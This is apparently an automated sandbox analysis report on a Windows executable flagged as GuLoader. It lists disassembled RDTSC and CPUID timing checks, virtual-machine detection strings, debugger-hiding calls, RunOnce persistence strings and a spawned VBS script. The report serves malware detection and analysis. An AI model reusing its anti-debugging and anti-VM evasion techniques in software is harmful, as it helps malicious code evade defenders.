RDTSC instruction interceptor: First address: 0000000000567DB5 second address: 0000000000567DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000567E05 second address: 0000000000567C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000567C28 second address: 0000000000567E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions: |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions: |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\FANEBREREN.exe\DYKKERDRAGTSSoftware\Microsoft\Windows\CurrentVersion\RunOnceAMPHITHYRONS |
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F55BFE LdrInitializeThunk, |
0_2_04F55BFE |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5546D mov eax, dword ptr fs:[00000030h] |
0_2_04F5546D |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5864F mov eax, dword ptr fs:[00000030h] |
0_2_04F5864F |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F5380C mov eax, dword ptr fs:[00000030h] |
0_2_04F5380C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F585F7 mov eax, dword ptr fs:[00000030h] |
0_2_04F585F7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F579C6 mov eax, dword ptr fs:[00000030h] |
0_2_04F579C6 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F573B7 mov eax, dword ptr fs:[00000030h] |
0_2_04F573B7 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F52D7C mov eax, dword ptr fs:[00000030h] |
0_2_04F52D7C |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Code function: 0_2_04F58355 mov eax, dword ptr fs:[00000030h] |
0_2_04F58355 |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\Fec9qUX4at.exe |
Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' |
Jump to behavior |
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp, logs.dat.17.dr |
Binary or memory string: [ Program Manager ] |
Source: Fec9qUX4at.exe, 00000011.00000002.487647862.00000000009D7000.00000004.00000020.sdmp |
Binary or memory string: Program Managerq |
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp |
Binary or memory string: |Program Manager| |
Source: C:\Windows\SysWOW64\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Jump to behavior |
Source: Initial file |
Signature Results: GuLoader behavior |
Source: Yara match |
File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR |